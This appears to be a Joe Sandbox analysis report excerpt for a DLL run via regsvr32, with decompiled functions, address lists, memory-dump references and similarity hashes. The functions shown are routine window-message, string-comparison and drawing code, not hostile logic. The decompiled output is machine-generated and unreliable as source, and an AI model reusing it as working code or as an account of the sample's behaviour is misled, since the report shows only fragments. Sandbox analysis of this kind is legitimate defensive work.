                                                                                                                0x1000289e
                                                                                                                0x10002880
                                                                                                                0x1000288b
                                                                                                                0x10002892
                                                                                                                0x10002897
                                                                                                                0x1000289c
                                                                                                                0x100028a2
                                                                                                                0x100028a5
                                                                                                                0x100028a7
                                                                                                                0x100028bf
                                                                                                                0x100028c3
                                                                                                                0x100028a9
                                                                                                                0x100028a9
                                                                                                                0x100028af
                                                                                                                0x100028b2
                                                                                                                0x00000000
                                                                                                                0x100028b4
                                                                                                                0x100028b6
                                                                                                                0x100028bb
                                                                                                                0x100028bb
                                                                                                                0x100028b2
                                                                                                                0x100028ce
                                                                                                                0x100028d3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000289c
                                                                                                                0x100028ec
                                                                                                                0x100028fb

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16lstrlen$CharH_prolog3_Upper
                                                                                                                • String ID:
                                                                                                                • API String ID: 2510594690-0
                                                                                                                • Opcode ID: 31b8b21528551e7caf2cc8c94ddfc67866e2f752817a23d77c51cc73f81293eb
                                                                                                                • Instruction ID: c739c987975fa42a882cae45f6a6da5a93788f44317763295bcd52b982e06518
                                                                                                                • Opcode Fuzzy Hash: 31b8b21528551e7caf2cc8c94ddfc67866e2f752817a23d77c51cc73f81293eb
                                                                                                                • Instruction Fuzzy Hash: 6C31A17AD01525ABFB11EB608C469FF3769EF45780F114025FE01F715ADE24AE4287E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100442FE Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E100442FE(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				_t55 = __edx;
				_t51 = __ecx;
				_t56 = GetCapture;
				_t57 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E10013FEA(0, _t51, _t58, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
				if(E10013FEA(0, _t51, _t58, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
					L19:
					E10044171(0, _t57, _t69);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
								_t51 = _t57;
								E10043FC9(_t57, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E10013FEA(0, _t51, _t58, GetCapture());
								_t69 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if(__eflags != 0) {
								_t51 = _t57;
								E10043FC9(_t57, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t53 = _v32.pt;
							_t55 = _v8;
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_push(_t53);
							_push(_t53);
							_t37 = _t59;
							 *_t37 = _t53;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t51 = _t57;
							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
								E10043FFD(_t51, _t56);
							} else {
								E10043F4D(_t51);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_t54 = _t57;
							if(__eflags == 0) {
								E100442BA(0, _t58, __eflags);
							} else {
								E100441B6(_t54, _t55, _t56, _t57, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E1001935C();
					goto L19;
				}
			}





















                                                                                                                0x100442fe
                                                                                                                0x100442fe
                                                                                                                0x10044307
                                                                                                                0x1004430d
                                                                                                                0x10044313
                                                                                                                0x100443ed
                                                                                                                0x00000000
                                                                                                                0x100443ed
                                                                                                                0x10044326
                                                                                                                0x10044336
                                                                                                                0x100443e6
                                                                                                                0x100443e8
                                                                                                                0x00000000
                                                                                                                0x1004433c
                                                                                                                0x1004433e
                                                                                                                0x10044356
                                                                                                                0x1004435b
                                                                                                                0x100443bb
                                                                                                                0x100443c1
                                                                                                                0x100443c8
                                                                                                                0x100443ca
                                                                                                                0x100443ca
                                                                                                                0x100443cf
                                                                                                                0x100443d3
                                                                                                                0x100443d5
                                                                                                                0x100443d8
                                                                                                                0x100443dd
                                                                                                                0x100443e0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100443e0
                                                                                                                0x00000000
                                                                                                                0x100443d3
                                                                                                                0x1004435d
                                                                                                                0x1004435e
                                                                                                                0x100443a6
                                                                                                                0x100443ac
                                                                                                                0x100443b2
                                                                                                                0x100443b4
                                                                                                                0x100443b4
                                                                                                                0x00000000
                                                                                                                0x100443ac
                                                                                                                0x10044360
                                                                                                                0x10044365
                                                                                                                0x1004437f
                                                                                                                0x10044382
                                                                                                                0x10044385
                                                                                                                0x1004438b
                                                                                                                0x1004438c
                                                                                                                0x1004438d
                                                                                                                0x1004438f
                                                                                                                0x10044391
                                                                                                                0x10044394
                                                                                                                0x10044396
                                                                                                                0x1004439f
                                                                                                                0x10044398
                                                                                                                0x10044398
                                                                                                                0x10044398
                                                                                                                0x00000000
                                                                                                                0x10044396
                                                                                                                0x10044368
                                                                                                                0x10044369
                                                                                                                0x100443fe
                                                                                                                0x10044404
                                                                                                                0x10044406
                                                                                                                0x1004440f
                                                                                                                0x10044408
                                                                                                                0x10044408
                                                                                                                0x10044408
                                                                                                                0x00000000
                                                                                                                0x10044416
                                                                                                                0x10044371
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10044377
                                                                                                                0x00000000
                                                                                                                0x10044377
                                                                                                                0x100443f4
                                                                                                                0x100443f7
                                                                                                                0x00000000
                                                                                                                0x100443f7

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Capture$Message$Dispatch
                                                                                                                • String ID:
                                                                                                                • API String ID: 3654672037-0
                                                                                                                • Opcode ID: a6ca19de07636f760ffd3117dadc32a41dfb2d1a450fbb9ad055af08d0fe31e1
                                                                                                                • Instruction ID: 038cb224890085f827a759f96853b5fd9b84b1ba0a667fefa5421cfc8a7f22d1
                                                                                                                • Opcode Fuzzy Hash: a6ca19de07636f760ffd3117dadc32a41dfb2d1a450fbb9ad055af08d0fe31e1
                                                                                                                • Instruction Fuzzy Hash: C131B474A0020ADBDB50DFA488859AF77F9EB44A82F734439F445D2161CE70EE44D66A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100010D7 Relevance: 9.1, APIs: 6, Instructions: 100stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E100010D7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t25;
				char* _t26;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t50;
				void* _t53;
				char* _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t61;

				_t53 = __edx;
				E100476B6(0x1008d74b, __ebx, __edi, __esi);
				_t25 =  *0x100bb480(0xc);
				_t55 = 0;
				_t50 = _t25;
				 *((intOrPtr*)(_t60 - 0x18)) = 0;
				_t58 = lstrlenW;
				 *((intOrPtr*)(_t60 - 4)) = 0;
				if( *(_t60 + 0x10) != 0) {
					 *((intOrPtr*)(_t60 - 0x14)) = lstrlenW( *(_t60 + 0x10)) + 1;
					_t43 = L10001357(_t60 - 0x14, lstrlenW( *(_t60 + 0x10)) + 1, 2);
					_t61 = _t61 + 0xc;
					if(_t43 < 0) {
						L8:
						_push(0x8007000e);
						L10001401(_t50, _t51, _t53, _t55, _t58, _t60);
					} else {
						_t56 =  *((intOrPtr*)(_t60 - 0x14));
						_t66 = _t56 - 0x400;
						if(_t56 > 0x400) {
							L6:
							_t51 = _t60 - 0x18;
							_t44 = L100012BC(_t50, _t60 - 0x18, _t53, _t56, __eflags, _t56);
						} else {
							_t46 = L10001492(_t50, _t53, _t56, lstrlenW, _t66);
							_t51 = _t56;
							if(_t46 == 0) {
								goto L6;
							} else {
								E10048380(_t56);
								_t44 = _t61;
							}
						}
						_t55 = L100010B4(_t44,  *(_t60 + 0x10), _t56, _t50);
						if(_t55 == 0) {
							goto L8;
						}
					}
				}
				_t26 = 0;
				if( *(_t60 + 0x18) != 0) {
					 *((intOrPtr*)(_t60 - 0x14)) = lstrlenW( *(_t60 + 0x18)) + 1;
					_t34 = L10001357(_t60 - 0x14, lstrlenW( *(_t60 + 0x18)) + 1, 2);
					_t61 = _t61 + 0xc;
					if(_t34 < 0) {
						goto L8;
					} else {
						_t58 =  *((intOrPtr*)(_t60 - 0x14));
						_t71 = _t58 - 0x400;
						if(_t58 > 0x400) {
							L14:
							_t51 = _t60 - 0x18;
							_t36 = L100012BC(_t50, _t60 - 0x18, _t53, _t55, __eflags, _t58);
						} else {
							_t37 = L10001492(_t50, _t53, _t55, _t58, _t71);
							_t51 = _t58;
							if(_t37 == 0) {
								goto L14;
							} else {
								E10048380(_t58);
								_t36 = _t61;
							}
						}
						_t26 = L100010B4(_t36,  *(_t60 + 0x18), _t58, _t50);
						if(_t26 == 0) {
							goto L8;
						}
					}
				}
				L10001389(CompareStringA( *(_t60 + 8),  *(_t60 + 0xc), _t55,  *(_t60 + 0x14), _t26,  *(_t60 + 0x1c)), _t60 - 0x18);
				return E10047739(_t50, _t55, _t27);
			}

















                                                                                                                0x100010d7
                                                                                                                0x10002395
                                                                                                                0x1000239a
                                                                                                                0x100023a0
                                                                                                                0x100023a2
                                                                                                                0x100023a4
                                                                                                                0x100023aa
                                                                                                                0x100023b0
                                                                                                                0x100023b3
                                                                                                                0x100023be
                                                                                                                0x100023c5
                                                                                                                0x100023ca
                                                                                                                0x100023cf
                                                                                                                0x1000240c
                                                                                                                0x1000240c
                                                                                                                0x10002411
                                                                                                                0x100023d1
                                                                                                                0x100023d1
                                                                                                                0x100023d4
                                                                                                                0x100023da
                                                                                                                0x100023f2
                                                                                                                0x100023f3
                                                                                                                0x100023f6
                                                                                                                0x100023dc
                                                                                                                0x100023dd
                                                                                                                0x100023e4
                                                                                                                0x100023e5
                                                                                                                0x00000000
                                                                                                                0x100023e7
                                                                                                                0x100023e9
                                                                                                                0x100023ee
                                                                                                                0x100023ee
                                                                                                                0x100023e5
                                                                                                                0x10002406
                                                                                                                0x1000240a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000240a
                                                                                                                0x100023cf
                                                                                                                0x10002416
                                                                                                                0x1000241b
                                                                                                                0x10002426
                                                                                                                0x1000242d
                                                                                                                0x10002432
                                                                                                                0x10002437
                                                                                                                0x00000000
                                                                                                                0x10002439
                                                                                                                0x10002439
                                                                                                                0x1000243c
                                                                                                                0x10002442
                                                                                                                0x1000245a
                                                                                                                0x1000245b
                                                                                                                0x1000245e
                                                                                                                0x10002444
                                                                                                                0x10002445
                                                                                                                0x1000244c
                                                                                                                0x1000244d
                                                                                                                0x00000000
                                                                                                                0x1000244f
                                                                                                                0x10002451
                                                                                                                0x10002456
                                                                                                                0x10002456
                                                                                                                0x1000244d
                                                                                                                0x10002469
                                                                                                                0x10002470
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10002470
                                                                                                                0x10002437
                                                                                                                0x1000248b
                                                                                                                0x1000249a

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10002395
                                                                                                                • lstrlenW.KERNEL32(?), ref: 100023B8
                                                                                                                • __alloca_probe_16.LIBCMT ref: 100023E9
                                                                                                                • lstrlenW.KERNEL32(?), ref: 10002420
                                                                                                                • __alloca_probe_16.LIBCMT ref: 10002451
                                                                                                                • CompareStringA.KERNEL32(?,?,00000000,?,00000000,?), ref: 10002480
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16lstrlen$CompareH_prolog3_String
                                                                                                                • String ID:
                                                                                                                • API String ID: 1160588780-0
                                                                                                                • Opcode ID: 9d013c2916ee938c159a400f5332b1904fa44bacd70884df55512697e3d458fb
                                                                                                                • Instruction ID: 96e6864510ac77364847bf10cd6c9172ca1897ca378224d80866f79966e83715
                                                                                                                • Opcode Fuzzy Hash: 9d013c2916ee938c159a400f5332b1904fa44bacd70884df55512697e3d458fb
                                                                                                                • Instruction Fuzzy Hash: EC318F7590011AABEF01DFA08D46AEF3BA9EF402D0F114125FE01E2156DB34AE61D7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10001500 Relevance: 9.1, APIs: 6, Instructions: 93stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10001500(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t24;
				CHAR* _t25;
				void* _t33;
				void* _t34;
				void* _t41;
				void* _t42;
				void* _t54;
				CHAR* _t56;
				intOrPtr _t57;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				void* _t65;

				_t54 = __edx;
				E100476B6(0x1008d783, __ebx, __edi, __esi);
				_t24 =  *0x100bb480(0x10);
				_t56 = 0;
				 *((intOrPtr*)(_t62 - 0x1c)) = _t24;
				 *((intOrPtr*)(_t62 - 0x18)) = 0;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				if( *(_t62 + 0xc) != 0) {
					 *((intOrPtr*)(_t62 - 0x14)) = lstrlenW( *(_t62 + 0xc)) + 1;
					_t41 = L10001357(_t62 - 0x14, lstrlenW( *(_t62 + 0xc)) + 1, 2);
					_t63 = _t63 + 0xc;
					if(_t41 >= 0) {
						_t57 =  *((intOrPtr*)(_t62 - 0x14));
						_t69 = _t57 - 0x400;
						if(_t57 > 0x400) {
							L6:
							_t42 = L100012BC(0x400, _t62 - 0x18, _t54, _t57, __eflags, _t57);
						} else {
							_push(_t57);
							if(L10001492(0x400, _t54, _t57, lstrlenW, _t69) == 0) {
								goto L6;
							} else {
								E10048380(_t57);
								_t42 = _t63;
							}
						}
						_t56 = L100010B4(_t42,  *(_t62 + 0xc), _t57,  *((intOrPtr*)(_t62 - 0x1c)));
					}
				}
				_t25 = 0;
				if( *(_t62 + 8) != 0) {
					 *((intOrPtr*)(_t62 - 0x14)) = lstrlenW( *(_t62 + 8)) + 1;
					_t33 = L10001357(_t62 - 0x14, lstrlenW( *(_t62 + 8)) + 1, 2);
					_t65 = _t63 + 0xc;
					if(_t33 >= 0) {
						_t61 =  *((intOrPtr*)(_t62 - 0x14));
						__eflags = _t61 - 0x400;
						if(__eflags > 0) {
							L14:
							_t34 = L100012BC(0x400, _t62 - 0x18, _t54, _t56, __eflags, _t61);
						} else {
							_push(_t61);
							__eflags = L10001492(0x400, _t54, _t56, _t61, __eflags);
							if(__eflags == 0) {
								goto L14;
							} else {
								E10048380(_t61);
								_t34 = _t65;
							}
						}
						_t25 = L100010B4(_t34,  *(_t62 + 8), _t61,  *((intOrPtr*)(_t62 - 0x1c)));
					} else {
						_t25 = 0;
					}
				}
				L10001389(lstrcmpiA(_t25, _t56), _t62 - 0x18);
				return E10047739(0x400, _t56, _t26);
			}
















                                                                                                                0x10001500
                                                                                                                0x10002511
                                                                                                                0x10002516
                                                                                                                0x1000251c
                                                                                                                0x1000251e
                                                                                                                0x10002521
                                                                                                                0x1000252d
                                                                                                                0x10002535
                                                                                                                0x10002540
                                                                                                                0x10002547
                                                                                                                0x1000254c
                                                                                                                0x10002551
                                                                                                                0x10002553
                                                                                                                0x10002556
                                                                                                                0x10002558
                                                                                                                0x10002570
                                                                                                                0x10002574
                                                                                                                0x1000255a
                                                                                                                0x1000255a
                                                                                                                0x10002563
                                                                                                                0x00000000
                                                                                                                0x10002565
                                                                                                                0x10002567
                                                                                                                0x1000256c
                                                                                                                0x1000256c
                                                                                                                0x10002563
                                                                                                                0x10002586
                                                                                                                0x10002586
                                                                                                                0x10002551
                                                                                                                0x10002588
                                                                                                                0x1000258d
                                                                                                                0x10002598
                                                                                                                0x1000259f
                                                                                                                0x100025a4
                                                                                                                0x100025a9
                                                                                                                0x100025af
                                                                                                                0x100025b2
                                                                                                                0x100025b4
                                                                                                                0x100025cc
                                                                                                                0x100025d0
                                                                                                                0x100025b6
                                                                                                                0x100025b6
                                                                                                                0x100025bc
                                                                                                                0x100025bf
                                                                                                                0x00000000
                                                                                                                0x100025c1
                                                                                                                0x100025c3
                                                                                                                0x100025c8
                                                                                                                0x100025c8
                                                                                                                0x100025bf
                                                                                                                0x100025dd
                                                                                                                0x100025ab
                                                                                                                0x100025ab
                                                                                                                0x100025ab
                                                                                                                0x100025a9
                                                                                                                0x100025ef
                                                                                                                0x100025fe

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16lstrlen$H_prolog3_lstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 1103306039-0
                                                                                                                • Opcode ID: 511b95c1ad40573d413672c05b008e67172cb2b4439da7bc769cb913e5acf12d
                                                                                                                • Instruction ID: 9d3677159b335e25cff1d48c936262dc40f9816cf0325abab7cf80bf5a6e2688
                                                                                                                • Opcode Fuzzy Hash: 511b95c1ad40573d413672c05b008e67172cb2b4439da7bc769cb913e5acf12d
                                                                                                                • Instruction Fuzzy Hash: 08218F75D0051AAAEF00EBA08C569EF7BB9EF44281F114025FD05F715AEA30AF51CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003E100 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003E100(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t78;
				void* _t79;
				void* _t80;

				_t80 = __eflags;
				E1004764D(0x100917b7, __ebx, __edi, __esi);
				_t78 = __ecx;
				L1000CDFE(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
				E1000C8F5(_t78, _t79 - 0x1c);
				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				E1000BF2B(_t79 - 0x40, _t79 - 0x2c);
				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				 *((intOrPtr*)( *_t78 + 0x148))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
				E1000BFAF(_t79 - 0x40, _t79 - 0x1c);
				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
				 *((intOrPtr*)( *_t78 + 0x14c))(_t79 - 0x40, _t79 - 0x1c);
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				return E10047725(L1000CE52(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
			}






                                                                                                                0x1003e100
                                                                                                                0x1004302a
                                                                                                                0x1004302f
                                                                                                                0x10043035
                                                                                                                0x1004303a
                                                                                                                0x10043045
                                                                                                                0x10043052
                                                                                                                0x1004305e
                                                                                                                0x10043079
                                                                                                                0x10043082
                                                                                                                0x10043097
                                                                                                                0x100430a5
                                                                                                                0x100430b2
                                                                                                                0x100430c1
                                                                                                                0x100430d3
                                                                                                                0x100430d9
                                                                                                                0x100430ea

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1004302A
                                                                                                                  • Part of subcall function 1000CDFE: __EH_prolog3.LIBCMT ref: 1000CE05
                                                                                                                  • Part of subcall function 1000CDFE: GetWindowDC.USER32(00000000), ref: 1000CE31
                                                                                                                • GetClientRect.USER32 ref: 10043045
                                                                                                                • GetWindowRect.USER32 ref: 10043052
                                                                                                                  • Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D93), ref: 1000C909
                                                                                                                  • Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D9B), ref: 1000C912
                                                                                                                • OffsetRect.USER32 ref: 10043079
                                                                                                                  • Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF50
                                                                                                                  • Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF65
                                                                                                                • OffsetRect.USER32 ref: 10043097
                                                                                                                  • Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFD4
                                                                                                                  • Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFE9
                                                                                                                • SendMessageA.USER32 ref: 100430C1
                                                                                                                  • Part of subcall function 1000CE52: __EH_prolog3.LIBCMT ref: 1000CE59
                                                                                                                  • Part of subcall function 1000CE52: ReleaseDC.USER32(?,00000000), ref: 1000CE76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952362992-0
                                                                                                                • Opcode ID: e9d7e286e1b9ae75c77a8180d9047b3534f23ef26796b9d622b48514738db08e
                                                                                                                • Instruction ID: c88571772fa0b80cc6a0098a865d4c4e15fcb43bc89952879f8554f4dc41fe22
                                                                                                                • Opcode Fuzzy Hash: e9d7e286e1b9ae75c77a8180d9047b3534f23ef26796b9d622b48514738db08e
                                                                                                                • Instruction Fuzzy Hash: 1C21D67691051AEFDB19DBA4CC95DFEB3B8FF08300F004269E656A31A0DB246A06CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003C70C Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
